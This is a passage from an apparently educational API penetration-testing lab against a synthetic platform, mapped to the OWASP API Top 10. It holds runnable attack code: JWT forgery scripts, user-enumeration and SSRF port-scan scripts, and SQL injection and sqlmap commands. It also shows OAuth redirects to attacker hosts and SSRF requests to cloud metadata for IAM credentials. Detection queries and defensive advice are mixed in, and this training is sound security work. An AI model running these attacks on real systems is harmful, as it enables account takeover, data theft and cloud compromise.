    "sub": "user-1001",
    "tenant": "tenant-001",
    "role": "admin",
    "scopes": ["read", "write", "admin", "billing"],
    "iat": 1711936000,
    "exp": 1999999999,
    "iss": "auth.example.com"
}

# Sign with HS256 using the RSA public key as the HMAC secret
# This works when the server uses the same key variable for both algorithms
forged_token = jwt.encode(
    payload,
    public_key,
    algorithm="HS256",
    headers={"kid": "test-key-1"}
)

print(f"Forged token: {forged_token}")

Algorithm Confusion Explained

In RS256, the server uses a private key to sign and a public key to verify. In HS256, the same secret is used for both operations. If the server doesn't enforce the expected algorithm and uses the same key variable regardless of algorithm, an attacker can: 1. Obtain the RSA public key (which is meant to be public) 2. Change the JWT header algorithm from RS256 to HS256 3. Sign the token with the public key using HMAC 4. The server verifies using the same public key as the HMAC secret — and it succeeds

Test JWT Kid (Key ID) Injection

# Test kid parameter injection via directory traversal
python3 jwt_tool.py "$TOKEN" -X i -I -hc kid -hv "../../../../../../dev/null" -pc role -pv admin

# Test kid parameter injection via SQL injection
python3 jwt_tool.py "$TOKEN" -X i -I -hc kid -hv "test-key-1' UNION SELECT 'SYNTHETIC-KEY' -- " -pc role -pv admin
# KID injection via directory traversal (SYNTHETIC - educational only)
import jwt

payload = {
    "sub": "user-1001",
    "tenant": "tenant-001",
    "role": "admin",
    "scopes": ["read", "write", "admin", "billing"],
    "iat": 1711936000,
    "exp": 1999999999,
    "iss": "auth.example.com"
}

# If kid is used to read a file for the signing key,
# pointing it to /dev/null (empty file) means the key is an empty string
forged_token = jwt.encode(
    payload,
    "",  # empty string as key
    algorithm="HS256",
    headers={
        "kid": "../../../../../../dev/null",
        "typ": "JWT"
    }
)

print(f"Forged token (kid traversal): {forged_token}")

Step 2.2: Broken Object Level Authorization (BOLA)

Test IDOR on User Profiles

# Access own profile (authorized)
curl -s https://api.example.com/v2/users/user-1001/profile \
  -H "Authorization: Bearer $TOKEN" | jq .

Expected Output (Synthetic):

{
  "id": "user-1001",
  "username": "testuser",
  "email": "testuser@example.com",
  "full_name": "Test User",
  "tenant": "tenant-001",
  "role": "user",
  "phone": "+1-555-0100",
  "address": "123 Test Street, Example City",
  "created_at": "2025-01-15T10:00:00Z",
  "last_login": "2026-04-01T08:05:00Z",
  "subscription_tier": "basic",
  "api_keys": [
    {
      "id": "key-001",
      "prefix": "nova_k1_****",
      "created_at": "2025-06-01T00:00:00Z",
      "last_used": "2026-03-31T12:00:00Z"
    }
  ]
}
# Attempt to access another user's profile (BOLA test)
curl -s https://api.example.com/v2/users/user-1002/profile \
  -H "Authorization: Bearer $TOKEN" | jq .

Expected Output (Synthetic):

{
  "id": "user-1002",
  "username": "jane.smith",
  "email": "jane.smith@example.com",
  "full_name": "Jane Smith",
  "tenant": "tenant-001",
  "role": "user",
  "phone": "+1-555-0101",
  "address": "456 Another Road, Example Town",
  "created_at": "2025-02-20T14:00:00Z",
  "last_login": "2026-03-30T16:20:00Z",
  "subscription_tier": "premium",
  "api_keys": [
    {
      "id": "key-042",
      "prefix": "nova_k1_****",
      "created_at": "2025-07-15T00:00:00Z",
      "last_used": "2026-03-28T09:15:00Z"
    }
  ]
}

Critical Finding: Broken Object Level Authorization

The API returns full profile data for any user when given a valid user ID, regardless of whether the authenticated user should have access. The testuser account can view jane.smith's private profile including email, phone, address, and API key metadata. This is API1:2023 — Broken Object Level Authorization.

Enumerate User IDs via BOLA

# BOLA enumeration script (SYNTHETIC - educational only)
import requests
import json

base_url = "https://api.example.com/v2"
headers = {
    "Authorization": "Bearer SYNTHETIC_TOKEN_HERE",
    "Content-Type": "application/json"
}

# Predictable user ID pattern: user-XXXX
discovered_users = []

for i in range(1001, 1020):
    user_id = f"user-{i}"
    response = requests.get(
        f"{base_url}/users/{user_id}/profile",
        headers=headers,
        verify=True  # Always verify TLS in real tests
    )

    if response.status_code == 200:
        user_data = response.json()
        discovered_users.append({
            "id": user_data["id"],
            "username": user_data["username"],
            "email": user_data["email"],
            "role": user_data["role"],
            "tenant": user_data["tenant"]
        })
        print(f"[+] Found: {user_id} - {user_data['username']} ({user_data['role']})")
    elif response.status_code == 404:
        print(f"[-] Not found: {user_id}")
    else:
        print(f"[?] Unexpected {response.status_code}: {user_id}")

print(f"\n[*] Total users discovered: {len(discovered_users)}")
print(json.dumps(discovered_users, indent=2))

Expected Output (Synthetic):

[+] Found: user-1001 - testuser (user)
[+] Found: user-1002 - jane.smith (user)
[+] Found: user-1003 - bob.wilson (user)
[-] Not found: user-1004
[+] Found: user-1005 - alice.chen (user)
[+] Found: user-1006 - carlos.reyes (user)
[-] Not found: user-1007
...
[+] Found: user-1015 - sarah.kumar (premium)

[*] Total users discovered: 11

Cross-Tenant BOLA

# Test cross-tenant access — use tenant-001 token to access tenant-002 project
curl -s https://api.example.com/v2/projects/proj-2001 \
  -H "Authorization: Bearer $TOKEN" | jq .

Expected Output (Synthetic):

{
  "id": "proj-2001",
  "name": "Classified Research Project",
  "description": "Confidential R&D initiative for Q3 launch",
  "tenant": "tenant-002",
  "owner": "user-2001",
  "created_at": "2026-01-10T09:00:00Z",
  "files_count": 47,
  "collaborators": [
    {"user_id": "user-2001", "role": "owner"},
    {"user_id": "user-2002", "role": "editor"}
  ],
  "settings": {
    "visibility": "private",
    "allow_external_sharing": false
  }
}

Critical Finding: Cross-Tenant Data Access

A user from tenant-001 can access projects belonging to tenant-002 simply by changing the project ID in the URL. The API does not validate tenant boundaries. This is a critical API1:2023 — Broken Object Level Authorization vulnerability that compromises multi-tenant isolation.

Step 2.3: Broken Function Level Authorization

# Test admin endpoints with standard user token

# 1. Admin user listing
curl -s https://api.example.com/v2/admin/users \
  -H "Authorization: Bearer $TOKEN" | jq '.users | length'
# Expected: Returns user list even though testuser is not admin

# 2. Admin configuration
curl -s https://api.example.com/v2/admin/config \
  -H "Authorization: Bearer $TOKEN" | jq .

# 3. Admin audit log
curl -s https://api.example.com/v2/admin/audit-log \
  -H "Authorization: Bearer $TOKEN" | jq '.entries[:3]'

# 4. User impersonation (admin-only function)
curl -s -X POST https://api.example.com/v2/admin/impersonate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"target_user_id": "user-9001"}' | jq .

Expected Output for Impersonation (Synthetic):

{
  "impersonation_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.SYNTHETIC_IMPERSONATION_TOKEN",
  "target_user": {
    "id": "user-9001",
    "username": "admin",
    "role": "admin"
  },
  "expires_in": 1800,
  "warning": "You are now acting as user-9001"
}

Critical Finding: Function Level Authorization Bypass

The /v2/admin/impersonate endpoint, which should be restricted to admin users only, is accessible by standard users. A regular user can impersonate any user including administrators, effectively achieving full privilege escalation. This is API5:2023 — Broken Function Level Authorization.

Step 2.4: OAuth2 Flow Exploitation

Authorization Code Interception

# Step 1: Initiate OAuth2 flow — note the state parameter handling
curl -s -D - "https://auth.example.com/oauth2/authorize?\
client_id=REDACTED-CLIENT-ID&\
response_type=code&\
redirect_uri=https://app.example.com/callback&\
scope=read+write+admin&\
state=random-state-value" 2>&1 | head -20

Test Redirect URI Manipulation

# Test open redirect in OAuth2 flow
# 1. Subdomain takeover via redirect_uri
curl -s -o /dev/null -w "%{http_code} %{redirect_url}" \
  "https://auth.example.com/oauth2/authorize?\
client_id=REDACTED-CLIENT-ID&\
response_type=code&\
redirect_uri=https://evil.app.example.com/callback&\
scope=read+write&\
state=test-state"

# 2. Path traversal in redirect_uri
curl -s -o /dev/null -w "%{http_code} %{redirect_url}" \
  "https://auth.example.com/oauth2/authorize?\
client_id=REDACTED-CLIENT-ID&\
response_type=code&\
redirect_uri=https://app.example.com/callback/../../../attacker-page&\
scope=read+write&\
state=test-state"

# 3. Fragment-based redirect bypass
curl -s -o /dev/null -w "%{http_code} %{redirect_url}" \
  "https://auth.example.com/oauth2/authorize?\
client_id=REDACTED-CLIENT-ID&\
response_type=code&\
redirect_uri=https://app.example.com/callback%23@attacker.example.com&\
scope=read+write&\
state=test-state"

Expected Output (Synthetic):

302 https://evil.app.example.com/callback?code=SYNTHETIC-AUTH-CODE&state=test-state
302 https://app.example.com/attacker-page?code=SYNTHETIC-AUTH-CODE&state=test-state
400 (rejected - fragment-based bypass blocked)

Finding: OAuth2 Redirect URI Validation Bypass

The authorization server accepts redirect URIs with subdomain variations and path traversal. An attacker could register a subdomain like evil.app.example.com and steal authorization codes. The server should enforce exact match on registered redirect URIs. This is API2:2023 — Broken Authentication.

Scope Escalation

# Request admin scope as regular user — test if authorization server validates
curl -s -X POST https://auth.example.com/oauth2/token \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "grant_type=authorization_code&\
code=SYNTHETIC-AUTH-CODE&\
client_id=REDACTED-CLIENT-ID&\
client_secret=REDACTED-CLIENT-SECRET&\
redirect_uri=https://app.example.com/callback&\
scope=read write admin billing"

Expected Output (Synthetic):

{
  "access_token": "eyJhbGciOiJSUzI1NiJ9.SYNTHETIC_ELEVATED_TOKEN",
  "token_type": "Bearer",
  "expires_in": 3600,
  "scope": "read write admin billing",
  "refresh_token": "REDACTED-REFRESH-TOKEN"
}

Finding: OAuth2 Scope Escalation

The authorization server grants admin and billing scopes to a regular user without validation. The token endpoint should verify that the requested scopes are authorized for the authenticated user's role. This is API2:2023 — Broken Authentication.

Step 2.5: Forge Legacy v1 API Tokens

# The v1 token format is base64(username:timestamp:role:tenant)
# Forge an admin token
FORGED_V1=$(echo -n "admin:1711936000:admin:tenant-001" | base64)
echo "Forged v1 token: $FORGED_V1"

# Use forged token to access v1 admin endpoints
curl -s https://api.example.com/v1/admin/users \
  -H "Authorization: Basic $FORGED_V1" | jq .

Expected Output (Synthetic):

{
  "users": [
    {"id": "user-1001", "username": "testuser", "email": "testuser@example.com", "role": "user"},
    {"id": "user-1002", "username": "jane.smith", "email": "jane.smith@example.com", "role": "user"},
    {"id": "user-9001", "username": "admin", "email": "admin@novatech.example.com", "role": "admin"}
  ],
  "total": 15
}

Critical Finding: Complete Authentication Bypass via Legacy API

The v1 API uses unsigned base64-encoded tokens. Any user can forge administrative tokens by encoding admin:timestamp:admin:tenant-id. Combined with the lack of API version decommissioning, this provides a trivial path to full administrative access. This combines API2:2023 — Broken Authentication with API9:2023 — Improper Inventory Management.

Detection & Defense — Exercise 2

KQL Detection: JWT Manipulation Attempts

// Detect JWT algorithm confusion and forged token attempts
ApiAccessLog
| where TimeGenerated > ago(1h)
| extend TokenHeader = extract(@"^([^.]+)\.", 1, AuthorizationHeader)
| extend DecodedHeader = base64_decode_tostring(TokenHeader)
| extend Algorithm = extract(@'"alg"\s*:\s*"([^"]+)"', 1, DecodedHeader)
| where Algorithm in ("none", "HS256", "HS384", "HS512")
    and Algorithm != "RS256"  // Expected algorithm
| project TimeGenerated, ClientIP, URL, Algorithm, StatusCode, UserAgent
| summarize
    AttemptCount = count(),
    Algorithms = make_set(Algorithm),
    TargetEndpoints = make_set(URL, 20)
    by ClientIP, bin(TimeGenerated, 5m)

KQL Detection: BOLA / IDOR Attacks

// Detect sequential object ID enumeration
ApiAccessLog
| where TimeGenerated > ago(15m)
| where URL matches regex @"/users/user-\d+/"
| extend TargetUserID = extract(@"/users/(user-\d+)", 1, URL)
| extend AuthUserID = extract(@'"sub"\s*:\s*"([^"]+)"', 1, TokenPayload)
| where TargetUserID != AuthUserID  // Accessing other users' resources
| summarize
    UniqueTargets = dcount(TargetUserID),
    RequestCount = count(),
    TargetList = make_set(TargetUserID, 50)
    by AuthUserID, ClientIP, bin(TimeGenerated, 5m)
| where UniqueTargets > 3
| order by UniqueTargets desc

KQL Detection: Cross-Tenant Access

// Detect access attempts across tenant boundaries
ApiAccessLog
| where TimeGenerated > ago(1h)
| extend RequestTenant = extract(@'"tenant"\s*:\s*"([^"]+)"', 1, TokenPayload)
| extend ResourceTenant = extract(@'"tenant"\s*:\s*"([^"]+)"', 1, ResponseBody)
| where isnotempty(RequestTenant) and isnotempty(ResourceTenant)
| where RequestTenant != ResourceTenant
| project TimeGenerated, ClientIP, URL, RequestTenant, ResourceTenant, StatusCode
| summarize CrossTenantAttempts = count() by RequestTenant, ResourceTenant, ClientIP

SPL Detection: Authentication Anomalies

index=api_logs sourcetype=api_access
| eval jwt_header=mvindex(split(authorization, "."), 0)
| eval decoded_header=base64decode(jwt_header)
| rex field=decoded_header "\"alg\"\s*:\s*\"(?<jwt_algorithm>[^\"]+)\""
| search jwt_algorithm!=RS256
| stats count as attempts, values(jwt_algorithm) as algorithms,
        dc(uri_path) as unique_endpoints by src_ip _time span=5m
| where attempts > 1
| sort -attempts

Defensive Recommendations

Securing API Authentication and Authorization

  1. Enforce JWT algorithm on the server side — never trust the alg header from the client. Hardcode RS256 in the verification logic and reject tokens with any other algorithm
  2. Implement object-level authorization checks — every endpoint that accesses a resource must verify that the authenticated user has permission to access that specific object
  3. Enforce tenant isolation at the data layer — add tenant ID to every database query as a mandatory filter, not just as a check in application code
  4. Use opaque, non-sequential resource IDs — replace predictable IDs like user-1001 with UUIDs or random identifiers to prevent enumeration
  5. Validate OAuth2 redirect URIs with exact match — do not allow subdomain wildcards or path variations
  6. Implement scope validation — the authorization server must verify that requested scopes are appropriate for the authenticated user's role
  7. Decommission legacy API versions — if v1 must remain, apply the same security controls as v2, including JWT-based authentication
  8. Add rate limiting to authentication endpoints — prevent brute-force token forging attempts

Cross-Reference

For deeper coverage of authentication mechanisms and penetration testing methodology, see Chapter 16: Penetration Testing and Chapter 44: Web App Pentesting.


Exercise 3: Injection & Data Exposure

Objectives

  • Discover and exploit SQL injection vulnerabilities through API parameters
  • Exploit mass assignment to escalate privileges or modify protected fields
  • Identify excessive data exposure in API responses
  • Execute SSRF attacks through API endpoint parameters
  • Test for NoSQL injection in search functionality

OWASP API Mapping

Finding Category OWASP API 2023
SQL injection API8:2023 — Security Misconfiguration
Mass assignment API3:2023 — Broken Object Property Level Authorization
Excessive data exposure API3:2023 — Broken Object Property Level Authorization
SSRF API7:2023 — Server Side Request Forgery

Step 3.1: SQL Injection via API Parameters

Test Search Endpoint for SQLi

# Normal search request
curl -s -X POST https://api.example.com/v2/search \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query": "project report", "type": "projects", "limit": 10}' | jq .

Expected Output (Synthetic):

{
  "results": [
    {
      "id": "proj-1001",
      "name": "Q1 Project Report",
      "type": "project",
      "score": 0.95
    },
    {
      "id": "proj-1003",
      "name": "Annual Report Dashboard",
      "type": "project",
      "score": 0.82
    }
  ],
  "total": 2,
  "query_time_ms": 45
}

Inject SQL via Sort Parameter

# Test ORDER BY injection in the sort parameter
curl -s "https://api.example.com/v2/projects?sort=name&order=ASC" \
  -H "Authorization: Bearer $TOKEN" | jq .

# Inject via sort parameter
curl -s "https://api.example.com/v2/projects?sort=name;SELECT+pg_sleep(5)--&order=ASC" \
  -H "Authorization: Bearer $TOKEN" -w "\nTime: %{time_total}s\n"

Expected Output (Synthetic):

{
  "error": "Database error",
  "detail": "column \"name;SELECT pg_sleep(5)--\" does not exist"
}
Time: 0.234s
# Time-based blind SQL injection via sort parameter
# Test with conditional sleep
curl -s "https://api.example.com/v2/projects?sort=CASE+WHEN+(1=1)+THEN+pg_sleep(5)+ELSE+name+END&order=ASC" \
  -H "Authorization: Bearer $TOKEN" -w "\nTime: %{time_total}s\n"

Expected Output (Synthetic):

Time: 5.312s    ← Response delayed by ~5 seconds confirms SQLi
# Confirm with false condition (should be fast)
curl -s "https://api.example.com/v2/projects?sort=CASE+WHEN+(1=2)+THEN+pg_sleep(5)+ELSE+name+END&order=ASC" \
  -H "Authorization: Bearer $TOKEN" -w "\nTime: %{time_total}s\n"

Expected Output (Synthetic):

Time: 0.198s    ← Fast response confirms conditional execution

Critical Finding: Blind SQL Injection in Sort Parameter

The sort parameter is directly interpolated into the SQL ORDER BY clause without sanitization. Time-based blind SQL injection is confirmed. An attacker could extract the entire database contents through conditional time delays. This represents both an injection vulnerability and API8:2023 — Security Misconfiguration (lack of parameterized queries).

Automated SQLi Extraction with sqlmap

# Use sqlmap for automated extraction (SYNTHETIC - educational only)
sqlmap -u "https://api.example.com/v2/projects?sort=name&order=ASC" \
  --headers="Authorization: Bearer $TOKEN" \
  --param-del="&" \
  -p "sort" \
  --technique=T \
  --dbms=PostgreSQL \
  --level=3 \
  --risk=2 \
  --batch \
  --threads=1 \
  --delay=1

# Expected sqlmap output (SYNTHETIC):
# [INFO] parameter 'sort' is vulnerable. Type: time-based blind
# [INFO] the back-end DBMS is PostgreSQL
# Extract database information (SYNTHETIC - educational only)
sqlmap -u "https://api.example.com/v2/projects?sort=name&order=ASC" \
  --headers="Authorization: Bearer $TOKEN" \
  -p "sort" \
  --technique=T \
  --dbms=PostgreSQL \
  --dbs \
  --batch

Expected Output (Synthetic):

available databases [3]:
[*] information_schema
[*] novaplatform_db
[*] pg_catalog
# Enumerate tables (SYNTHETIC - educational only)
sqlmap -u "https://api.example.com/v2/projects?sort=name&order=ASC" \
  --headers="Authorization: Bearer $TOKEN" \
  -p "sort" \
  --technique=T \
  --dbms=PostgreSQL \
  -D novaplatform_db \
  --tables \
  --batch

Expected Output (Synthetic):

Database: novaplatform_db
[12 tables]
+------------------------+
| users                  |
| projects               |
| files                  |
| api_keys               |
| oauth_clients          |
| oauth_tokens           |
| webhooks               |
| audit_log              |
| billing_subscriptions  |
| billing_invoices       |
| tenant_config          |
| sessions               |
+------------------------+

SQL Injection via JSON Body Parameters

# Test SQLi in JSON body search query
curl -s -X POST https://api.example.com/v2/search \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query": "test\" OR 1=1--", "type": "projects", "limit": 100}' | jq .

Expected Output (Synthetic):

{
  "results": [
    {"id": "proj-1001", "name": "Q1 Project Report", "type": "project"},
    {"id": "proj-1002", "name": "Internal Tools", "type": "project"},
    {"id": "proj-1003", "name": "Annual Report Dashboard", "type": "project"},
    {"id": "proj-2001", "name": "Classified Research Project", "type": "project"},
    {"id": "proj-2002", "name": "Competitor Analysis", "type": "project"}
  ],
  "total": 47,
  "query_time_ms": 12
}

Finding: UNION-style SQLi Returns Cross-Tenant Data

The search endpoint with SQL injection returns all 47 projects across all tenants, including tenant-002 data like "Classified Research Project" and "Competitor Analysis". The query parameter is injected into a SQL WHERE clause without parameterization.

Extract Sensitive Data via UNION Injection

# UNION-based extraction of API keys (SYNTHETIC - educational only)
curl -s -X POST https://api.example.com/v2/search \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "query": "x\" UNION SELECT id, key_value, user_id, NULL, NULL FROM api_keys--",
    "type": "projects",
    "limit": 100
  }' | jq .

Expected Output (Synthetic):

{
  "results": [
    {
      "id": "key-001",
      "name": "REDACTED-API-KEY-EXAMPLE",
      "type": "user-1001",
      "score": null
    },
    {
      "id": "key-042",
      "name": "REDACTED-API-KEY-EXAMPLE",
      "type": "user-1002",
      "score": null
    },
    {
      "id": "key-099",
      "name": "REDACTED-API-KEY-EXAMPLE",
      "type": "user-9001",
      "score": null
    }
  ],
  "total": 15
}

Step 3.2: Mass Assignment Attacks

Identify Writable Fields via API Spec Analysis

# Review the PATCH /v2/me endpoint schema
cat novaplatform-openapi.json | jq '.paths["/v2/me"].patch.requestBody.content["application/json"].schema'

Expected Output (Synthetic):

{
  "type": "object",
  "properties": {
    "full_name": {"type": "string"},
    "email": {"type": "string", "format": "email"},
    "phone": {"type": "string"},
    "address": {"type": "string"},
    "notification_preferences": {
      "type": "object",
      "properties": {
        "email_alerts": {"type": "boolean"},
        "sms_alerts": {"type": "boolean"}
      }
    }
  }
}

Test Mass Assignment — Role Escalation

# Attempt to set role via profile update (field not in documented schema)
curl -s -X PATCH https://api.example.com/v2/me \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "full_name": "Test User",
    "role": "admin"
  }' | jq .

Expected Output (Synthetic):

{
  "id": "user-1001",
  "username": "testuser",
  "email": "testuser@example.com",
  "full_name": "Test User",
  "role": "admin",
  "tenant": "tenant-001",
  "subscription_tier": "basic",
  "updated_at": "2026-04-01T09:15:00Z"
}

Critical Finding: Mass Assignment — Role Escalation

The role field is not documented in the API specification for the PATCH /v2/me endpoint, but the server accepts and applies it. A standard user can escalate to admin by including "role": "admin" in a profile update request. This is API3:2023 — Broken Object Property Level Authorization.

Test Mass Assignment — Subscription Upgrade

# Attempt to upgrade subscription tier without payment
curl -s -X PATCH https://api.example.com/v2/me \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "full_name": "Test User",
    "subscription_tier": "enterprise",
    "billing_exempt": true
  }' | jq .

Expected Output (Synthetic):

{
  "id": "user-1001",
  "username": "testuser",
  "email": "testuser@example.com",
  "full_name": "Test User",
  "role": "admin",
  "tenant": "tenant-001",
  "subscription_tier": "enterprise",
  "billing_exempt": true,
  "updated_at": "2026-04-01T09:16:00Z"
}

Finding: Mass Assignment — Financial Impact

The user can set subscription_tier to "enterprise" and billing_exempt to true, bypassing the payment process entirely. This has direct financial impact — it is both API3:2023 — Broken Object Property Level Authorization and API6:2023 — Unrestricted Access to Sensitive Business Flows.

Test Mass Assignment — Tenant Switching

# Attempt to switch tenant via profile update
curl -s -X PATCH https://api.example.com/v2/me \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "full_name": "Test User",
    "tenant": "tenant-002"
  }' | jq .

Expected Output (Synthetic):

{
  "id": "user-1001",
  "username": "testuser",
  "email": "testuser@example.com",
  "full_name": "Test User",
  "role": "admin",
  "tenant": "tenant-002",
  "subscription_tier": "enterprise",
  "updated_at": "2026-04-01T09:17:00Z"
}

Critical Finding: Mass Assignment — Tenant Boundary Breach

A user can switch their tenant affiliation by including "tenant": "tenant-002" in a profile update. Combined with the BOLA vulnerabilities, this completely breaks multi-tenant isolation. An attacker can migrate themselves to any tenant and access all of its resources.

Step 3.3: Excessive Data Exposure

Analyze API Response Verbosity

# Request project listing — analyze what data is returned vs. what is needed
curl -s https://api.example.com/v2/projects \
  -H "Authorization: Bearer $TOKEN" | jq '.projects[0]'

Expected Output (Synthetic):

{
  "id": "proj-1001",
  "name": "Q1 Project Report",
  "description": "Quarterly project performance analysis",
  "tenant": "tenant-001",
  "owner": {
    "id": "user-1001",
    "username": "testuser",
    "email": "testuser@example.com",
    "phone": "+1-555-0100",
    "role": "user",
    "password_hash": "$2b$12$SYNTHETIC_HASH_VALUE_HERE",
    "last_password_change": "2026-01-15T00:00:00Z",
    "mfa_secret": "JBSWY3DPEHPK3PXP",
    "api_keys": [
      {
        "id": "key-001",
        "key_value": "REDACTED-API-KEY-EXAMPLE",
        "created_at": "2025-06-01T00:00:00Z"
      }
    ]
  },
  "created_at": "2026-01-20T10:00:00Z",
  "updated_at": "2026-03-15T14:30:00Z",
  "files_count": 12,
  "storage_used_bytes": 52428800,
  "settings": {
    "visibility": "team",
    "allow_external_sharing": true
  },
  "internal_notes": "Flagged for review by compliance team",
  "billing_code": "CC-4521",
  "infrastructure": {
    "s3_path": "s3://novaplatform-files-staging/tenant-001/proj-1001/",
    "cdn_url": "https://cdn.example.com/files/tenant-001/proj-1001/"
  }
}

Critical Finding: Massive Data Exposure

The project listing endpoint returns the owner's full user object including:

  • password_hash — bcrypt hash that can be subjected to offline cracking
  • mfa_secret — TOTP seed that allows generating valid MFA codes
  • api_keys[].key_value — full API keys, not just prefixes
  • internal_notes — internal business context
  • infrastructure.s3_path — internal S3 bucket paths

This is a severe API3:2023 — Broken Object Property Level Authorization issue. The API is returning the raw database model without field filtering.

Exploit MFA Secret Exposure

# Generate valid TOTP codes from exposed MFA secret (SYNTHETIC - educational only)
import pyotp
import time

# MFA secret exposed in API response
exposed_mfa_secret = "JBSWY3DPEHPK3PXP"  # SYNTHETIC

# Generate current TOTP code
totp = pyotp.TOTP(exposed_mfa_secret)
current_code = totp.now()
print(f"Current TOTP code: {current_code}")
print(f"Valid for: {30 - (int(time.time()) % 30)} seconds")

# An attacker with this secret can generate valid MFA codes indefinitely
# This completely defeats the purpose of MFA

Step 3.4: Server-Side Request Forgery (SSRF)

SSRF via Webhook Test Endpoint

# Legitimate webhook test
curl -s -X POST https://api.example.com/v2/integrations/webhook-test \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "https://webhook.example.com/test",
    "payload": {"event": "test", "timestamp": "2026-04-01T10:00:00Z"}
  }' | jq .

Expected Output (Synthetic):

{
  "status": "success",
  "response_code": 200,
  "response_body": "{\"received\": true}",
  "response_time_ms": 156
}

SSRF — Probe Internal Network

# Attempt SSRF to internal metadata service (cloud)
curl -s -X POST https://api.example.com/v2/integrations/webhook-test \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "http://169.254.169.254/latest/meta-data/",
    "payload": {"event": "test"}
  }' | jq .

Expected Output (Synthetic):

{
  "status": "success",
  "response_code": 200,
  "response_body": "ami-id\nami-launch-index\nami-manifest-path\nhostname\ninstance-action\ninstance-id\ninstance-life-cycle\ninstance-type\nlocal-hostname\nlocal-ipv4\nmac\nnetwork\nplacement\nprofile\npublic-hostname\npublic-ipv4\npublic-keys\nreservation-id\nsecurity-groups\nservices",
  "response_time_ms": 3
}

Critical Finding: SSRF to Cloud Metadata Service

The webhook test endpoint makes server-side HTTP requests to arbitrary URLs without restriction. It successfully contacts the AWS Instance Metadata Service (IMDS) at 169.254.169.254, which can expose IAM credentials, instance identity, and cloud configuration. This is API7:2023 — Server Side Request Forgery.

SSRF — Extract Cloud Credentials

# Retrieve IAM role credentials via SSRF (SYNTHETIC)
curl -s -X POST https://api.example.com/v2/integrations/webhook-test \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "payload": {"event": "test"}
  }' | jq -r '.response_body'

Expected Output (Synthetic):

novaplatform-api-role
# Retrieve temporary credentials for the IAM role (SYNTHETIC)
curl -s -X POST https://api.example.com/v2/integrations/webhook-test \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/novaplatform-api-role",
    "payload": {"event": "test"}
  }' | jq -r '.response_body' | jq .

Expected Output (Synthetic):

{
  "Code": "Success",
  "LastUpdated": "2026-04-01T08:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "REDACTED",
  "SecretAccessKey": "REDACTED",
  "Token": "REDACTED",
  "Expiration": "2026-04-01T14:00:00Z"
}

Critical Finding: SSRF Enables Cloud Account Takeover

Through SSRF, an attacker can retrieve temporary AWS credentials from the Instance Metadata Service. These credentials inherit the IAM role's permissions (novaplatform-api-role), which likely include S3 access to all tenant files, database access, and potentially administrative AWS capabilities. This is a critical API7:2023 — Server Side Request Forgery finding with maximum impact.

SSRF — Scan Internal Network

# Internal network port scanning via SSRF (SYNTHETIC - educational only)
import requests
import json
import time

base_url = "https://api.example.com/v2/integrations/webhook-test"
headers = {
    "Authorization": "Bearer SYNTHETIC_TOKEN_HERE",
    "Content-Type": "application/json"
}

# Scan known internal subnet
internal_targets = [
    ("10.50.2.10", 5432, "PostgreSQL"),
    ("10.50.2.20", 6379, "Redis"),
    ("10.50.2.30", 9200, "Elasticsearch"),
    ("10.50.1.30", 9000, "OAuth2 Server"),
    ("10.50.3.10", 8443, "Webhook Dispatcher"),
]

for ip, port, service in internal_targets:
    try:
        response = requests.post(
            base_url,
            headers=headers,
            json={
                "url": f"http://{ip}:{port}/",
                "payload": {"event": "test"}
            },
            timeout=10
        )
        result = response.json()
        status = result.get("response_code", "timeout")
        print(f"[{'OPEN' if status != 'timeout' else 'CLOSED'}] {ip}:{port} ({service}) - Status: {status}")
    except Exception as e:
        print(f"[ERROR] {ip}:{port} ({service}) - {str(e)}")

    time.sleep(0.5)  # Rate limiting

Expected Output (Synthetic):

[OPEN] 10.50.2.10:5432 (PostgreSQL) - Status: 200
[OPEN] 10.50.2.20:6379 (Redis) - Status: 200
[OPEN] 10.50.2.30:9200 (Elasticsearch) - Status: 200
[OPEN] 10.50.1.30:9000 (OAuth2 Server) - Status: 200
[OPEN] 10.50.3.10:8443 (Webhook Dispatcher) - Status: 200

SSRF — Access Internal Elasticsearch

# Query Elasticsearch directly via SSRF (SYNTHETIC)
curl -s -X POST https://api.example.com/v2/integrations/webhook-test \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "http://10.50.2.30:9200/_cat/indices?v",
    "payload": {"event": "test"}
  }' | jq -r '.response_body'

Expected Output (Synthetic):

health status index                     uuid                   pri rep docs.count
green  open   novaplatform-projects     abc123SYNTHETIC        1   1   4521
green  open   novaplatform-users        def456SYNTHETIC        1   1   892
green  open   novaplatform-audit        ghi789SYNTHETIC        1   1   156203
green  open   novaplatform-files-meta   jkl012SYNTHETIC        1   1   28451
# Test for NoSQL injection in search filters
curl -s -X POST https://api.example.com/v2/search \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "query": "test",
    "type": "projects",
    "filters": {
      "owner": {"$ne": null},
      "visibility": {"$regex": ".*"}
    },
    "limit": 100
  }' | jq '.total'

Expected Output (Synthetic):

47

Finding: NoSQL Operator Injection

The search endpoint passes filter objects directly to the database query engine without sanitizing MongoDB-style operators ($ne, $regex, $gt, etc.). The $ne: null operator returns all documents where the owner field exists, bypassing intended filtering. While the primary database is PostgreSQL, the search functionality uses Elasticsearch which accepts similar operator syntax.

Detection & Defense — Exercise 3

KQL Detection: SQL Injection Attempts

// Detect SQL injection patterns in API requests
